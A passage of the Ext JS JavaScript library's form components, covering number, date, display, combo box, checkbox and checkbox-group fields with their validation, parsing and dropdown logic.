if (a < this.minValue) {
c.push(String.format(this.minText, this.minValue))
}
if (a > this.maxValue) {
c.push(String.format(this.maxText, this.maxValue))
}
return c
}, getValue:function () {
return this.fixPrecision(this.parseValue(Ext.form.NumberField.superclass.getValue.call(this)))
}, setValue:function (a) {
a = Ext.isNumber(a) ? a : parseFloat(String(a).replace(this.decimalSeparator, "."));
a = this.fixPrecision(a);
a = isNaN(a) ? "" : String(a).replace(".", this.decimalSeparator);
return Ext.form.NumberField.superclass.setValue.call(this, a)
}, setMinValue:function (a) {
this.minValue = Ext.num(a, Number.NEGATIVE_INFINITY)
}, setMaxValue:function (a) {
this.maxValue = Ext.num(a, Number.MAX_VALUE)
}, parseValue:function (a) {
a = parseFloat(String(a).replace(this.decimalSeparator, "."));
return isNaN(a) ? "" : a
}, fixPrecision:function (b) {
var a = isNaN(b);
if (!this.allowDecimals || this.decimalPrecision == -1 || a || !b) {
return a ? "" : b
}
return parseFloat(parseFloat(b).toFixed(this.decimalPrecision))
}, beforeBlur:function () {
var a = this.parseValue(this.getRawValue());
if (!Ext.isEmpty(a)) {
this.setValue(a)
}
}});
Ext.reg("numberfield", Ext.form.NumberField);
Ext.form.DateField = Ext.extend(Ext.form.TriggerField, {format:"m/d/Y", altFormats:"m/d/Y|n/j/Y|n/j/y|m/j/y|n/d/y|m/j/Y|n/d/Y|m-d-y|m-d-Y|m/d|m-d|md|mdy|mdY|d|Y-m-d|n-j|n/j", disabledDaysText:"Disabled", disabledDatesText:"Disabled", minText:"The date in this field must be equal to or after {0}", maxText:"The date in this field must be equal to or before {0}", invalidText:"{0} is not a valid date - it must be in the format {1}", triggerClass:"x-form-date-trigger", showToday:true, startDay:0, defaultAutoCreate:{tag:"input", type:"text", size:"10", autocomplete:"off"}, initTime:"12", initTimeFormat:"H", safeParse:function (b, c) {
if (Date.formatContainsHourInfo(c)) {
return Date.parseDate(b, c)
} else {
var a = Date.parseDate(b + " " + this.initTime, c + " " + this.initTimeFormat);
if (a) {
return a.clearTime()
}
}
}, initComponent:function () {
Ext.form.DateField.superclass.initComponent.call(this);
this.addEvents("select");
if (Ext.isString(this.minValue)) {
this.minValue = this.parseDate(this.minValue)
}
if (Ext.isString(this.maxValue)) {
this.maxValue = this.parseDate(this.maxValue)
}
this.disabledDatesRE = null;
this.initDisabledDays()
}, initEvents:function () {
Ext.form.DateField.superclass.initEvents.call(this);
this.keyNav = new Ext.KeyNav(this.el, {down:function (a) {
this.onTriggerClick()
}, scope:this, forceKeyDown:true})
}, initDisabledDays:function () {
if (this.disabledDates) {
var b = this.disabledDates, a = b.length - 1, c = "(?:";
Ext.each(b, function (g, e) {
c += Ext.isDate(g) ? "^" + Ext.escapeRe(g.dateFormat(this.format)) + "$" : b[e];
if (e != a) {
c += "|"
}
}, this);
this.disabledDatesRE = new RegExp(c + ")")
}
}, setDisabledDates:function (a) {
this.disabledDates = a;
this.initDisabledDays();
if (this.menu) {
this.menu.picker.setDisabledDates(this.disabledDatesRE)
}
}, setDisabledDays:function (a) {
this.disabledDays = a;
if (this.menu) {
this.menu.picker.setDisabledDays(a)
}
}, setMinValue:function (a) {
this.minValue = (Ext.isString(a) ? this.parseDate(a) : a);
if (this.menu) {
this.menu.picker.setMinDate(this.minValue)
}
}, setMaxValue:function (a) {
this.maxValue = (Ext.isString(a) ? this.parseDate(a) : a);
if (this.menu) {
this.menu.picker.setMaxDate(this.maxValue)
}
}, getErrors:function (e) {
var h = Ext.form.DateField.superclass.getErrors.apply(this, arguments);
e = this.formatDate(e || this.processValue(this.getRawValue()));
if (e.length < 1) {
return h
}
var c = e;
e = this.parseDate(e);
if (!e) {
h.push(String.format(this.invalidText, c, this.format));
return h
}
var g = e.getTime();
if (this.minValue && g < this.minValue.clearTime().getTime()) {
h.push(String.format(this.minText, this.formatDate(this.minValue)))
}
if (this.maxValue && g > this.maxValue.clearTime().getTime()) {
h.push(String.format(this.maxText, this.formatDate(this.maxValue)))
}
if (this.disabledDays) {
var a = e.getDay();
for (var b = 0; b < this.disabledDays.length; b++) {
if (a === this.disabledDays[b]) {
h.push(this.disabledDaysText);
break
}
}
}
var d = this.formatDate(e);
if (this.disabledDatesRE && this.disabledDatesRE.test(d)) {
h.push(String.format(this.disabledDatesText, d))
}
return h
}, validateBlur:function () {
return !this.menu || !this.menu.isVisible()
}, getValue:function () {
return this.parseDate(Ext.form.DateField.superclass.getValue.call(this)) || ""
}, setValue:function (a) {
return Ext.form.DateField.superclass.setValue.call(this, this.formatDate(this.parseDate(a)))
}, parseDate:function (g) {
if (!g || Ext.isDate(g)) {
return g
}
var b = this.safeParse(g, this.format), c = this.altFormats, e = this.altFormatsArray;
if (!b && c) {
e = e || c.split("|");
for (var d = 0, a = e.length; d < a && !b; d++) {
b = this.safeParse(g, e[d])
}
}
return b
}, onDestroy:function () {
Ext.destroy(this.menu, this.keyNav);
Ext.form.DateField.superclass.onDestroy.call(this)
}, formatDate:function (a) {
return Ext.isDate(a) ? a.dateFormat(this.format) : a
}, onTriggerClick:function () {
if (this.disabled) {
return
}
if (this.menu == null) {
this.menu = new Ext.menu.DateMenu({hideOnClick:false, focusOnSelect:false})
}
this.onFocus();
Ext.apply(this.menu.picker, {minDate:this.minValue, maxDate:this.maxValue, disabledDatesRE:this.disabledDatesRE, disabledDatesText:this.disabledDatesText, disabledDays:this.disabledDays, disabledDaysText:this.disabledDaysText, format:this.format, showToday:this.showToday, startDay:this.startDay, minText:String.format(this.minText, this.formatDate(this.minValue)), maxText:String.format(this.maxText, this.formatDate(this.maxValue))});
this.menu.picker.setValue(this.getValue() || new Date());
this.menu.show(this.el, "tl-bl?");
this.menuEvents("on")
}, menuEvents:function (a) {
this.menu[a]("select", this.onSelect, this);
this.menu[a]("hide", this.onMenuHide, this);
this.menu[a]("show", this.onFocus, this)
}, onSelect:function (a, b) {
this.setValue(b);
this.fireEvent("select", this, b);
this.menu.hide()
}, onMenuHide:function () {
this.focus(false, 60);
this.menuEvents("un")
}, beforeBlur:function () {
var a = this.parseDate(this.getRawValue());
if (a) {
this.setValue(a)
}
}});
Ext.reg("datefield", Ext.form.DateField);
Ext.form.DisplayField = Ext.extend(Ext.form.Field, {validationEvent:false, validateOnBlur:false, defaultAutoCreate:{tag:"div"}, fieldClass:"x-form-display-field", htmlEncode:false, initEvents:Ext.emptyFn, isValid:function () {
return true
}, validate:function () {
return true
}, getRawValue:function () {
var a = this.rendered ? this.el.dom.innerHTML : Ext.value(this.value, "");
if (a === this.emptyText) {
a = ""
}
if (this.htmlEncode) {
a = Ext.util.Format.htmlDecode(a)
}
return a
}, getValue:function () {
return this.getRawValue()
}, getName:function () {
return this.name
}, setRawValue:function (a) {
if (this.htmlEncode) {
a = Ext.util.Format.htmlEncode(a)
}
return this.rendered ? (this.el.dom.innerHTML = (Ext.isEmpty(a) ? "" : a)) : (this.value = a)
}, setValue:function (a) {
this.setRawValue(a);
return this
}});
Ext.reg("displayfield", Ext.form.DisplayField);
Ext.form.ComboBox = Ext.extend(Ext.form.TriggerField, {defaultAutoCreate:{tag:"input", type:"text", size:"24", autocomplete:"off"}, listClass:"", selectedClass:"x-combo-selected", listEmptyText:"", triggerClass:"x-form-arrow-trigger", shadow:"sides", listAlign:"tl-bl?", maxHeight:300, minHeight:90, triggerAction:"query", minChars:4, autoSelect:true, typeAhead:false, queryDelay:500, pageSize:0, selectOnFocus:false, queryParam:"query", loadingText:"Loading...", resizable:false, handleHeight:8, allQuery:"", mode:"remote", minListWidth:70, forceSelection:false, typeAheadDelay:250, lazyInit:true, clearFilterOnReset:true, submitValue:undefined, initComponent:function () {
Ext.form.ComboBox.superclass.initComponent.call(this);
this.addEvents("expand", "collapse", "beforeselect", "select", "beforequery");
if (this.transform) {
var c = Ext.getDom(this.transform);
if (!this.hiddenName) {
this.hiddenName = c.name
}
if (!this.store) {
this.mode = "local";
var j = [], e = c.options;
for (var b = 0, a = e.length; b < a; b++) {
var h = e[b], g = (h.hasAttribute ? h.hasAttribute("value") : h.getAttributeNode("value").specified) ? h.value : h.text;
if (h.selected && Ext.isEmpty(this.value, true)) {
this.value = g
}
j.push([g, h.text])
}
this.store = new Ext.data.ArrayStore({idIndex:0, fields:["value", "text"], data:j, autoDestroy:true});
this.valueField = "value";
this.displayField = "text"
}
c.name = Ext.id();
if (!this.lazyRender) {
this.target = true;
this.el = Ext.DomHelper.insertBefore(c, this.autoCreate || this.defaultAutoCreate);
this.render(this.el.parentNode, c)
}
Ext.removeNode(c)
} else {
if (this.store) {
this.store = Ext.StoreMgr.lookup(this.store);
if (this.store.autoCreated) {
this.displayField = this.valueField = "field1";
if (!this.store.expandData) {
this.displayField = "field2"
}
this.mode = "local"
}
}
}
this.selectedIndex = -1;
if (this.mode == "local") {
if (!Ext.isDefined(this.initialConfig.queryDelay)) {
this.queryDelay = 10
}
if (!Ext.isDefined(this.initialConfig.minChars)) {
this.minChars = 0
}
}
}, onRender:function (b, a) {
if (this.hiddenName && !Ext.isDefined(this.submitValue)) {
this.submitValue = false
}
Ext.form.ComboBox.superclass.onRender.call(this, b, a);
if (this.hiddenName) {
this.hiddenField = this.el.insertSibling({tag:"input", type:"hidden", name:this.hiddenName, id:(this.hiddenId || Ext.id())}, "before", true)
}
if (Ext.isGecko) {
this.el.dom.setAttribute("autocomplete", "off")
}
if (!this.lazyInit) {
this.initList()
} else {
this.on("focus", this.initList, this, {single:true})
}
}, initValue:function () {
Ext.form.ComboBox.superclass.initValue.call(this);
if (this.hiddenField) {
this.hiddenField.value = Ext.value(Ext.isDefined(this.hiddenValue) ? this.hiddenValue : this.value, "")
}
}, getParentZIndex:function () {
var a;
if (this.ownerCt) {
this.findParentBy(function (b) {
a = parseInt(b.getPositionEl().getStyle("z-index"), 10);
return !!a
})
}
return a
}, getZIndex:function (b) {
b = b || Ext.getDom(this.getListParent() || Ext.getBody());
var a = parseInt(Ext.fly(b).getStyle("z-index"), 10);
if (!a) {
a = this.getParentZIndex()
}
return(a || 12000) + 5
}, initList:function () {
if (!this.list) {
var a = "x-combo-list", c = Ext.getDom(this.getListParent() || Ext.getBody());
this.list = new Ext.Layer({parentEl:c, shadow:this.shadow, cls:[a, this.listClass].join(" "), constrain:false, zindex:this.getZIndex(c)});
var b = this.listWidth || Math.max(this.wrap.getWidth(), this.minListWidth);
this.list.setSize(b, 0);
this.list.swallowEvent("mousewheel");
this.assetHeight = 0;
if (this.syncFont !== false) {
this.list.setStyle("font-size", this.el.getStyle("font-size"))
}
if (this.title) {
this.header = this.list.createChild({cls:a + "-hd", html:this.title});
this.assetHeight += this.header.getHeight()
}
this.innerList = this.list.createChild({cls:a + "-inner"});
this.mon(this.innerList, "mouseover", this.onViewOver, this);
this.mon(this.innerList, "mousemove", this.onViewMove, this);
this.innerList.setWidth(b - this.list.getFrameWidth("lr"));
if (this.pageSize) {
this.footer = this.list.createChild({cls:a + "-ft"});
this.pageTb = new Ext.PagingToolbar({store:this.store, pageSize:this.pageSize, renderTo:this.footer});
this.assetHeight += this.footer.getHeight()
}
if (!this.tpl) {
this.tpl = '<tpl for="."><div class="' + a + '-item">{' + this.displayField + "}</div></tpl>"
}
this.view = new Ext.DataView({applyTo:this.innerList, tpl:this.tpl, singleSelect:true, selectedClass:this.selectedClass, itemSelector:this.itemSelector || "." + a + "-item", emptyText:this.listEmptyText, deferEmptyText:false});
this.mon(this.view, {containerclick:this.onViewClick, click:this.onViewClick, scope:this});
this.bindStore(this.store, true);
if (this.resizable) {
this.resizer = new Ext.Resizable(this.list, {pinned:true, handles:"se"});
this.mon(this.resizer, "resize", function (g, d, e) {
this.maxHeight = e - this.handleHeight - this.list.getFrameWidth("tb") - this.assetHeight;
this.listWidth = d;
this.innerList.setWidth(d - this.list.getFrameWidth("lr"));
this.restrictHeight()
}, this);
this[this.pageSize ? "footer" : "innerList"].setStyle("margin-bottom", this.handleHeight + "px")
}
}
}, getListParent:function () {
return document.body
}, getStore:function () {
return this.store
}, bindStore:function (a, b) {
if (this.store && !b) {
if (this.store !== a && this.store.autoDestroy) {
this.store.destroy()
} else {
this.store.un("beforeload", this.onBeforeLoad, this);
this.store.un("load", this.onLoad, this);
this.store.un("exception", this.collapse, this)
}
if (!a) {
this.store = null;
if (this.view) {
this.view.bindStore(null)
}
if (this.pageTb) {
this.pageTb.bindStore(null)
}
}
}
if (a) {
if (!b) {
this.lastQuery = null;
if (this.pageTb) {
this.pageTb.bindStore(a)
}
}
this.store = Ext.StoreMgr.lookup(a);
this.store.on({scope:this, beforeload:this.onBeforeLoad, load:this.onLoad, exception:this.collapse});
if (this.view) {
this.view.bindStore(a)
}
}
}, reset:function () {
if (this.clearFilterOnReset && this.mode == "local") {
this.store.clearFilter()
}
Ext.form.ComboBox.superclass.reset.call(this)
}, initEvents:function () {
Ext.form.ComboBox.superclass.initEvents.call(this);
this.keyNav = new Ext.KeyNav(this.el, {up:function (a) {
this.inKeyMode = true;
this.selectPrev()
}, down:function (a) {
if (!this.isExpanded()) {
this.onTriggerClick()
} else {
this.inKeyMode = true;
this.selectNext()
}
}, enter:function (a) {
this.onViewClick()
}, esc:function (a) {
this.collapse()
}, tab:function (a) {
if (this.forceSelection === true) {
this.collapse()
} else {
this.onViewClick(false)
}
return true
}, scope:this, doRelay:function (c, b, a) {
if (a == "down" || this.scope.isExpanded()) {
var d = Ext.KeyNav.prototype.doRelay.apply(this, arguments);
if (!Ext.isIE && Ext.EventManager.useKeydown) {
this.scope.fireKey(c)
}
return d
}
return true
}, forceKeyDown:true, defaultEventAction:"stopEvent"});
this.queryDelay = Math.max(this.queryDelay || 10, this.mode == "local" ? 10 : 250);
this.dqTask = new Ext.util.DelayedTask(this.initQuery, this);
if (this.typeAhead) {
this.taTask = new Ext.util.DelayedTask(this.onTypeAhead, this)
}
if (!this.enableKeyEvents) {
this.mon(this.el, "keyup", this.onKeyUp, this)
}
}, onDestroy:function () {
if (this.dqTask) {
this.dqTask.cancel();
this.dqTask = null
}
this.bindStore(null);
Ext.destroy(this.resizer, this.view, this.pageTb, this.list);
Ext.destroyMembers(this, "hiddenField");
Ext.form.ComboBox.superclass.onDestroy.call(this)
}, fireKey:function (a) {
if (!this.isExpanded()) {
Ext.form.ComboBox.superclass.fireKey.call(this, a)
}
}, onResize:function (a, b) {
Ext.form.ComboBox.superclass.onResize.apply(this, arguments);
if (!isNaN(a) && this.isVisible() && this.list) {
this.doResize(a)
} else {
this.bufferSize = a
}
}, doResize:function (a) {
if (!Ext.isDefined(this.listWidth)) {
var b = Math.max(a, this.minListWidth);
this.list.setWidth(b);
this.innerList.setWidth(b - this.list.getFrameWidth("lr"))
}
}, onEnable:function () {
Ext.form.ComboBox.superclass.onEnable.apply(this, arguments);
if (this.hiddenField) {
this.hiddenField.disabled = false
}
}, onDisable:function () {
Ext.form.ComboBox.superclass.onDisable.apply(this, arguments);
if (this.hiddenField) {
this.hiddenField.disabled = true
}
}, onBeforeLoad:function () {
if (!this.hasFocus) {
return
}
this.innerList.update(this.loadingText ? '<div class="loading-indicator">' + this.loadingText + "</div>" : "");
this.restrictHeight();
this.selectedIndex = -1
}, onLoad:function () {
if (!this.hasFocus) {
return
}
if (this.store.getCount() > 0 || this.listEmptyText) {
this.expand();
this.restrictHeight();
if (this.lastQuery == this.allQuery) {
if (this.editable) {
this.el.dom.select()
}
if (this.autoSelect !== false && !this.selectByValue(this.value, true)) {
this.select(0, true)
}
} else {
if (this.autoSelect !== false) {
this.selectNext()
}
if (this.typeAhead && this.lastKey != Ext.EventObject.BACKSPACE && this.lastKey != Ext.EventObject.DELETE) {
this.taTask.delay(this.typeAheadDelay)
}
}
} else {
this.collapse()
}
}, onTypeAhead:function () {
if (this.store.getCount() > 0) {
var b = this.store.getAt(0);
var c = b.data[this.displayField];
var a = c.length;
var d = this.getRawValue().length;
if (d != a) {
this.setRawValue(c);
this.selectText(d, c.length)
}
}
}, assertValue:function () {
var b = this.getRawValue(), a;
if (this.valueField && Ext.isDefined(this.value)) {
a = this.findRecord(this.valueField, this.value)
}
if (!a || a.get(this.displayField) != b) {
a = this.findRecord(this.displayField, b)
}
if (!a && this.forceSelection) {
if (b.length > 0 && b != this.emptyText) {
this.el.dom.value = Ext.value(this.lastSelectionText, "");
this.applyEmptyText()
} else {
this.clearValue()
}
} else {
if (a && this.valueField) {
if (this.value == b) {
return
}
b = a.get(this.valueField || this.displayField)
}
this.setValue(b)
}
}, onSelect:function (a, b) {
if (this.fireEvent("beforeselect", this, a, b) !== false) {
this.setValue(a.data[this.valueField || this.displayField]);
this.collapse();
this.fireEvent("select", this, a, b)
}
}, getName:function () {
var a = this.hiddenField;
return a && a.name ? a.name : this.hiddenName || Ext.form.ComboBox.superclass.getName.call(this)
}, getValue:function () {
if (this.valueField) {
return Ext.isDefined(this.value) ? this.value : ""
} else {
return Ext.form.ComboBox.superclass.getValue.call(this)
}
}, clearValue:function () {
if (this.hiddenField) {
this.hiddenField.value = ""
}
this.setRawValue("");
this.lastSelectionText = "";
this.applyEmptyText();
this.value = ""
}, setValue:function (a) {
var c = a;
if (this.valueField) {
var b = this.findRecord(this.valueField, a);
if (b) {
c = b.data[this.displayField]
} else {
if (Ext.isDefined(this.valueNotFoundText)) {
c = this.valueNotFoundText
}
}
}
this.lastSelectionText = c;
if (this.hiddenField) {
this.hiddenField.value = Ext.value(a, "")
}
Ext.form.ComboBox.superclass.setValue.call(this, c);
this.value = a;
return this
}, findRecord:function (c, b) {
var a;
if (this.store.getCount() > 0) {
this.store.each(function (d) {
if (d.data[c] == b) {
a = d;
return false
}
})
}
return a
}, onViewMove:function (b, a) {
this.inKeyMode = false
}, onViewOver:function (d, b) {
if (this.inKeyMode) {
return
}
var c = this.view.findItemFromChild(b);
if (c) {
var a = this.view.indexOf(c);
this.select(a, false)
}
}, onViewClick:function (b) {
var a = this.view.getSelectedIndexes()[0], c = this.store, d = c.getAt(a);
if (d) {
this.onSelect(d, a)
} else {
this.collapse()
}
if (b !== false) {
this.el.focus()
}
}, restrictHeight:function () {
this.innerList.dom.style.height = "";
var b = this.innerList.dom, e = this.list.getFrameWidth("tb") + (this.resizable ? this.handleHeight : 0) + this.assetHeight, c = Math.max(b.clientHeight, b.offsetHeight, b.scrollHeight), a = this.getPosition()[1] - Ext.getBody().getScroll().top, g = Ext.lib.Dom.getViewHeight() - a - this.getSize().height, d = Math.max(a, g, this.minHeight || 0) - this.list.shadowOffset - e - 5;
c = Math.min(c, d, this.maxHeight);
this.innerList.setHeight(c);
this.list.beginUpdate();
this.list.setHeight(c + e);
this.list.alignTo.apply(this.list, [this.el].concat(this.listAlign));
this.list.endUpdate()
}, isExpanded:function () {
return this.list && this.list.isVisible()
}, selectByValue:function (a, c) {
if (!Ext.isEmpty(a, true)) {
var b = this.findRecord(this.valueField || this.displayField, a);
if (b) {
this.select(this.store.indexOf(b), c);
return true
}
}
return false
}, select:function (a, c) {
this.selectedIndex = a;
this.view.select(a);
if (c !== false) {
var b = this.view.getNode(a);
if (b) {
this.innerList.scrollChildIntoView(b, false)
}
}
}, selectNext:function () {
var a = this.store.getCount();
if (a > 0) {
if (this.selectedIndex == -1) {
this.select(0)
} else {
if (this.selectedIndex < a - 1) {
this.select(this.selectedIndex + 1)
}
}
}
}, selectPrev:function () {
var a = this.store.getCount();
if (a > 0) {
if (this.selectedIndex == -1) {
this.select(0)
} else {
if (this.selectedIndex !== 0) {
this.select(this.selectedIndex - 1)
}
}
}
}, onKeyUp:function (b) {
var a = b.getKey();
if (this.editable !== false && this.readOnly !== true && (a == b.BACKSPACE || !b.isSpecialKey())) {
this.lastKey = a;
this.dqTask.delay(this.queryDelay)
}
Ext.form.ComboBox.superclass.onKeyUp.call(this, b)
}, validateBlur:function () {
return !this.list || !this.list.isVisible()
}, initQuery:function () {
this.doQuery(this.getRawValue())
}, beforeBlur:function () {
this.assertValue()
}, postBlur:function () {
Ext.form.ComboBox.superclass.postBlur.call(this);
this.collapse();
this.inKeyMode = false
}, doQuery:function (c, b) {
c = Ext.isEmpty(c) ? "" : c;
var a = {query:c, forceAll:b, combo:this, cancel:false};
if (this.fireEvent("beforequery", a) === false || a.cancel) {
return false
}
c = a.query;
b = a.forceAll;
if (b === true || (c.length >= this.minChars)) {
if (this.lastQuery !== c) {
this.lastQuery = c;
if (this.mode == "local") {
this.selectedIndex = -1;
if (b) {
this.store.clearFilter()
} else {
this.store.filter(this.displayField, c)
}
this.onLoad()
} else {
this.store.baseParams[this.queryParam] = c;
this.store.load({params:this.getParams(c)});
this.expand()
}
} else {
this.selectedIndex = -1;
this.onLoad()
}
}
}, getParams:function (a) {
var b = {}, c = this.store.paramNames;
if (this.pageSize) {
b[c.start] = 0;
b[c.limit] = this.pageSize
}
return b
}, collapse:function () {
if (!this.isExpanded()) {
return
}
this.list.hide();
Ext.getDoc().un("mousewheel", this.collapseIf, this);
Ext.getDoc().un("mousedown", this.collapseIf, this);
this.fireEvent("collapse", this)
}, collapseIf:function (a) {
if (!this.isDestroyed && !a.within(this.wrap) && !a.within(this.list)) {
this.collapse()
}
}, expand:function () {
if (this.isExpanded() || !this.hasFocus) {
return
}
if (this.title || this.pageSize) {
this.assetHeight = 0;
if (this.title) {
this.assetHeight += this.header.getHeight()
}
if (this.pageSize) {
this.assetHeight += this.footer.getHeight()
}
}
if (this.bufferSize) {
this.doResize(this.bufferSize);
delete this.bufferSize
}
this.list.alignTo.apply(this.list, [this.el].concat(this.listAlign));
this.list.setZIndex(this.getZIndex());
this.list.show();
if (Ext.isGecko2) {
this.innerList.setOverflow("auto")
}
this.mon(Ext.getDoc(), {scope:this, mousewheel:this.collapseIf, mousedown:this.collapseIf});
this.fireEvent("expand", this)
}, onTriggerClick:function () {
if (this.readOnly || this.disabled) {
return
}
if (this.isExpanded()) {
this.collapse();
this.el.focus()
} else {
this.onFocus({});
if (this.triggerAction == "all") {
this.doQuery(this.allQuery, true)
} else {
this.doQuery(this.getRawValue())
}
this.el.focus()
}
}});
Ext.reg("combo", Ext.form.ComboBox);
Ext.form.Checkbox = Ext.extend(Ext.form.Field, {focusClass:undefined, fieldClass:"x-form-field", checked:false, boxLabel:" ", defaultAutoCreate:{tag:"input", type:"checkbox", autocomplete:"off"}, actionMode:"wrap", initComponent:function () {
Ext.form.Checkbox.superclass.initComponent.call(this);
this.addEvents("check")
}, onResize:function () {
Ext.form.Checkbox.superclass.onResize.apply(this, arguments);
if (!this.boxLabel && !this.fieldLabel) {
this.el.alignTo(this.wrap, "c-c")
}
}, initEvents:function () {
Ext.form.Checkbox.superclass.initEvents.call(this);
this.mon(this.el, {scope:this, click:this.onClick, change:this.onClick})
}, markInvalid:Ext.emptyFn, clearInvalid:Ext.emptyFn, onRender:function (b, a) {
Ext.form.Checkbox.superclass.onRender.call(this, b, a);
if (this.inputValue !== undefined) {
this.el.dom.value = this.inputValue
}
this.wrap = this.el.wrap({cls:"x-form-check-wrap"});
if (this.boxLabel) {
this.wrap.createChild({tag:"label", htmlFor:this.el.id, cls:"x-form-cb-label", html:this.boxLabel})
}
if (this.checked) {
this.setValue(true)
} else {
this.checked = this.el.dom.checked
}
if (Ext.isIE && !Ext.isStrict) {
this.wrap.repaint()
}
this.resizeEl = this.positionEl = this.wrap
}, onDestroy:function () {
Ext.destroy(this.wrap);
Ext.form.Checkbox.superclass.onDestroy.call(this)
}, initValue:function () {
this.originalValue = this.getValue()
}, getValue:function () {
if (this.rendered) {
return this.el.dom.checked
}
return this.checked
}, onClick:function () {
if (this.el.dom.checked != this.checked) {
this.setValue(this.el.dom.checked)
}
}, setValue:function (a) {
var c = this.checked, b = this.inputValue;
if (a === false) {
this.checked = false
} else {
this.checked = (a === true || a === "true" || a == "1" || (b ? a == b : String(a).toLowerCase() == "on"))
}
if (this.rendered) {
this.el.dom.checked = this.checked;
this.el.dom.defaultChecked = this.checked
}
if (c != this.checked) {
this.fireEvent("check", this, this.checked);
if (this.handler) {
this.handler.call(this.scope || this, this, this.checked)
}
}
return this
}});
Ext.reg("checkbox", Ext.form.Checkbox);
Ext.form.CheckboxGroup = Ext.extend(Ext.form.Field, {columns:"auto", vertical:false, allowBlank:true, blankText:"You must select at least one item in this group", defaultType:"checkbox", groupCls:"x-form-check-group", initComponent:function () {
this.addEvents("change");
this.on("change", this.validate, this);
Ext.form.CheckboxGroup.superclass.initComponent.call(this)
}, onRender:function (j, g) {
if (!this.el) {
var p = {autoEl:{id:this.id}, cls:this.groupCls, layout:"column", renderTo:j, bufferResize:false};
var a = {xtype:"container", defaultType:this.defaultType, layout:"form", defaults:{hideLabel:true, anchor:"100%"}};
if (this.items[0].items) {
Ext.apply(p, {layoutConfig:{columns:this.items.length}, defaults:this.defaults, items:this.items});
for (var e = 0, m = this.items.length; e < m; e++) {
Ext.applyIf(this.items[e], a)
}
} else {
var d, n = [];
if (typeof this.columns == "string") {
this.columns = this.items.length
}
if (!Ext.isArray(this.columns)) {
var k = [];
for (var e = 0; e < this.columns; e++) {
k.push((100 / this.columns) * 0.01)
}
this.columns = k
}
d = this.columns.length;
for (var e = 0; e < d; e++) {
var b = Ext.apply({items:[]}, a);
b[this.columns[e] <= 1 ? "columnWidth" : "width"] = this.columns[e];
if (this.defaults) {
b.defaults = Ext.apply(b.defaults || {}, this.defaults)
}
n.push(b)
}
if (this.vertical) {
var r = Math.ceil(this.items.length / d), o = 0;
for (var e = 0, m = this.items.length; e < m; e++) {
if (e > 0 && e % r == 0) {
o++
}
if (this.items[e].fieldLabel) {
this.items[e].hideLabel = false
}
n[o].items.push(this.items[e])
}
} else {
for (var e = 0, m = this.items.length; e < m; e++) {
var q = e % d;
if (this.items[e].fieldLabel) {
this.items[e].hideLabel = false
}
n[q].items.push(this.items[e])
}
}
Ext.apply(p, {layoutConfig:{columns:d}, items:n})
}
this.panel = new Ext.Container(p);
this.panel.ownerCt = this;
this.el = this.panel.getEl();
if (this.forId && this.itemCls) {
var c = this.el.up(this.itemCls).child("label", true);
if (c) {
c.setAttribute("htmlFor", this.forId)
}
}
var h = this.panel.findBy(function (i) {
return i.isFormField
}, this);
this.items = new Ext.util.MixedCollection();
this.items.addAll(h)
}
Ext.form.CheckboxGroup.superclass.onRender.call(this, j, g)
}, initValue:function () {
if (this.value) {
this.setValue.apply(this, this.buffered ? this.value : [this.value]);
delete this.buffered;
delete this.value
}
}, afterRender:function () {
Ext.form.CheckboxGroup.superclass.afterRender.call(this);
this.eachItem(function (a) {
a.on("check", this.fireChecked, this);
a.inGroup = true
})
}, doLayout:function () {
if (this.rendered) {
this.panel.forceLayout = this.ownerCt.forceLayout;
this.panel.doLayout()
}
}, fireChecked:function () {
var a = [];
this.eachItem(function (b) {
if (b.checked) {
a.push(b)
}
});
this.fireEvent("change", this, a)
}, getErrors:function () {
var b = Ext.form.CheckboxGroup.superclass.getErrors.apply(this, arguments);
if (!this.allowBlank) {
var a = true;
this.eachItem(function (c) {
if (c.checked) {
return(a = false)
}
});
if (a) {
b.push(this.blankText)
}
}
return b
}, isDirty:function () {
if (this.disabled || !this.rendered) {
return false
}
var a = false;
this.eachItem(function (b) {
if (b.isDirty()) {
a = true;
return false
}
});
return a
}, setReadOnly:function (a) {
if (this.rendered) {
this.eachItem(function (b) {
b.setReadOnly(a)
})
}
this.readOnly = a
}, onDisable:function () {
this.eachItem(function (a) {
a.disable()
})
}, onEnable:function () {
this.eachItem(function (a) {
a.enable()
})
}, onResize:function (a, b) {
this.panel.setSize(a, b);
this.panel.doLayout()
}, reset:function () {
if (this.originalValue) {
this.eachItem(function (a) {
if (a.setValue) {
a.setValue(false);
a.originalValue = a.getValue()
}
});
this.resetOriginal = true;
this.setValue(this.originalValue);
delete this.resetOriginal
} else {
this.eachItem(function (a) {
if (a.reset) {
a.reset()
}
})
}
(function () {
this.clearInvalid()
}).defer(50, this)
}, setValue:function () {
if (this.rendered) {
this.onSetValue.apply(this, arguments)
} else {
this.buffered = true;
this.value = arguments
}
return this
}, onSetValue:function (d, c) {
if (arguments.length == 1) {
if (Ext.isArray(d)) {
Ext.each(d, function (h, e) {
if (Ext.isObject(h) && h.setValue) {
h.setValue(true);
if (this.resetOriginal === true) {
h.originalValue = h.getValue()
}
} else {
var g = this.items.itemAt(e);
if (g) {
g.setValue(h)
}
}
}, this)
} else {
if (Ext.isObject(d)) {
for (var a in d) {
var b = this.getBox(a);
if (b) {
b.setValue(d[a])
}
}
} else {
this.setValueForItem(d)
}
}
} else {
var b = this.getBox(d);
if (b) {
b.setValue(c)
}
}
}, beforeDestroy:function () {
Ext.destroy(this.panel);
if (!this.rendered) {
Ext.destroy(this.items)
}
Ext.form.CheckboxGroup.superclass.beforeDestroy.call(this)
}, setValueForItem:function (a) {
a = String(a).split(",");
this.eachItem(function (b) {
if (a.indexOf(b.inputValue) > -1) {
b.setValue(true)
}
})
}, getBox:function (b) {
var a = null;
this.eachItem(function (c) {
if (b == c || c.dataIndex == b || c.id == b || c.getName() == b) {
a = c;
return false
}
});
return a
}, getValue:function () {
var a = [];
this.eachItem(function (b) {
if (b.checked) {
a.push(b)
}
});
return a
}, eachItem:function (b, a) {
if (this.items && this.items.each) {
this.items.each(b, a || this)
}
}, getRawValue:Ext.emptyFn, setRawValue:Ext.emptyFn});
Ext.reg("checkboxgroup", Ext.form.CheckboxGroup);
Ext.form.CompositeField = Ext.extend(Ext.form.Field, {defaultMargins:"0 5 0 0", skipLastItemMargin:true, isComposite:true, combineErrors:true, labelConnector:", ", initComponent:function () {
var g = [], b = this.items, e;
for (var d = 0, c = b.length; d < c; d++) {
e = b[d];
if (!Ext.isEmpty(e.ref)) {
e.ref = "../" + e.ref
}
g.push(e.fieldLabel);
Ext.applyIf(e, this.defaults);
if (!(d == c - 1 && this.skipLastItemMargin)) {
